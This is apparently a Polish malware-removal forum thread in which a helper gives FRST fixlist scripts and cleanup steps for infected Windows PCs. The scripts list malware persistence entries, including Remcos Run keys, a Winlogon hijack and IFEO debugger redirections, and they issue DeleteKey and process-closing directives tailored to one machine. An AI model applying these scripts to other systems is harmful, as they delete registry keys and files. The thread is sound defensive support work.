{0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://startsear.ch/?aff=2&src=sp&cf=f612bbec-f919-11e1-bf52-0008caceadae&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493718224&z=1303e700b981664a9a477ccgaz9tfc2mbg9b5c0m9o&from=ypid&uid=WDCXWD3200BPVT-80JJ5T0_WD-WXU1EA1LERLZLERLZ&q={searchTerms} SearchScopes: HKU\S-1-5-21-859463877-3988447155-127319224-1000 -> {7DC5DCC1-3C36-4DC9-89E0-ABAEA354E1C3} URL = hxxp://websearch.ask.com/redirect?client=ie&tb=ORJ&o=&src=kw&q={searchTerms}&locale=&apn_ptnrs=U3&apn_dtid=OSJ000YYPL&apn_uid=60D452B4-09CD-4A8F-8AF9-187B1C1AF368&apn_sauid=CCFA6486-ADEA-4D51-9139-CF026C3432B5 BHO-x32: Brak nazwy -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> Brak pliku Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku S4 3DM; C:\Users\Norbert\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Norbert\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [brak podpisu cyfrowego] S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X] R2 SNARE; C:\Users\Norbert\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] U3 DfSdkS; Brak ImagePath C:\Users\Public\Desktop\ASUS\Entertainment\Game Park Console.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy). 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Zastosuj AdwCleaner najpierw z opcji Skanuj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

To może być problem infekcji skrótowej Zapoznaj się z zasadami działu leczenia systemu: KLIK.

OK. Nie, - przecież w innym przypadku bym Ci o tym napisał. Myślę, że możemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Proszę zapoznaj się z zasadami tego działu: KLIK.

System jest zainfekowany złośliwym oprogramowaniem ciężkiego kalibru co widać po raporcie z VirusTotal oraz co widać po stronie raportów. Adware...jest...jak zawsze, ale teraz jest pobocznym problemem. Leczymy system, pobieram dodatkowo informacje o uprawieniach z przykładowego folderu. 1. Przez panel sterowania odinstaluj: Zbędniki: Akamai NetSession Interface.Sugeruję również pozbycia się oprogramowania marki IObit. Dlaczego? To firma z szemraną przeszłością - potwierdzona kradzież bazy danych Malwarebytes. Innych kontrowersji nie wymieniam, bo są nieoficjalne i niepotwierdzone. W raportach widzę również szczątki po wątpliwym skanerze SpyHunter. Cytuje z tematu picasso: To jak postąpisz to Twoja decyzja, natomiast ja sugeruję zastosować SpyHunterCleaner, aby całkowicie usunąć ten twór. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM\...\Winlogon: [userinit] C:\Windows\system32\userinit.exe,C:\Users\Admin\AppData\Roaming\DCSCMIN\IMDCSC.exe HKU\S-1-5-21-2316587192-2815210435-4262640799-1000\...\Run: [MSConfig] => C:\Users\Admin\mfbprsq.exe [48173056 2017-04-28] (Bullguard) HKU\S-1-5-21-2316587192-2815210435-4262640799-1000\...\Run: [remcos] => C:\Users\Admin\AppData\Roaming\remcos\winmgr.exe [36864 2017-05-01] () HKU\S-1-5-21-2316587192-2815210435-4262640799-1000\...\Policies\Explorer\Run: [Wow6432Node] => C:\Users\Admin\AppData\Roaming\Microsoft\grihwbgd\gtvasbwc.exe [155140 2017-03-08] () C:\Users\Admin\AppData\Roaming\remcos C:\Users\Admin\AppData\Roaming\Microsoft\grihwbgd C:\Users\Admin\AppData\Roaming\DCSCMIN C:\Users\Admin\mfbprsq.exe HKU\S-1-5-21-2316587192-2815210435-4262640799-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1 IFEO\AUpdate.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\BigUpgrade_IU.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\DSPut.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\f2p_ping.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\Feedback.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\HiPatchService_IObitDel.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\HiRezGamesDiagAndSupport.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\Install_PintoStartMenu.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IObitDownloader.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IObitRegister.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IUDM.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IUPluginNotice.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IUService.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\IU_InstallBeforWork.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\maintenanceservice.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\NoteIcon.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\playstv.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\playstv_launcher.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_encoder_server-120220.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_encoder_server-122108.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_encoder_server64-120220.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_encoder_server64-122108.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_ep64.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\plays_service.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\ScreenShot.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\SendBugReportNew.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\upload_logs.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\VideoCardCompatibility.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe IFEO\XmasPromote.exe: [Debugger] D:\Advanced SystemCare\AutoReactivator.exe ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicyScripts: Ograniczenia GroupPolicyScripts-x32: Ograniczenia HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia URLSearchHook: [s-1-5-21-2316587192-2815210435-4262640799-1000] UWAGA => Brak domyślnego URLSearchHook FF Extension: (Fast search) - C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kb1gtk3k.default-1474363501998\Extensions\amcontextmenu@loucypher [2017-04-04] S3 avchv; system32\DRIVERS\avchv.sys [X] S1 bdfwfpf; \??\C:\Program Files\Lavasoft\Ad-Aware Antivirus\Firewall Engine\1.6.1.0\Drivers\bdfwfpf.sys [X] S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X] S3 gkernel; \??\C:\Users\Admin\AppData\Local\Temp\gkernel.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] S3 xspirit; \??\C:\Windows\xspirit.sys [X] DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains ListPermissions: C:\Windows Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt (raport wynikowy). 3. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 4. Zastosuj AdwCleaner najpierw z opcji Skanuj, a następnie z opcji Oczyść. Dostarcz raport z tego działania. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

OK.

W takim razie kończymy. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Pomyślnie wykonane. Jeśli Avast już będzie spokojny, a infekcja nie będzie dawała o sobie znaków to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.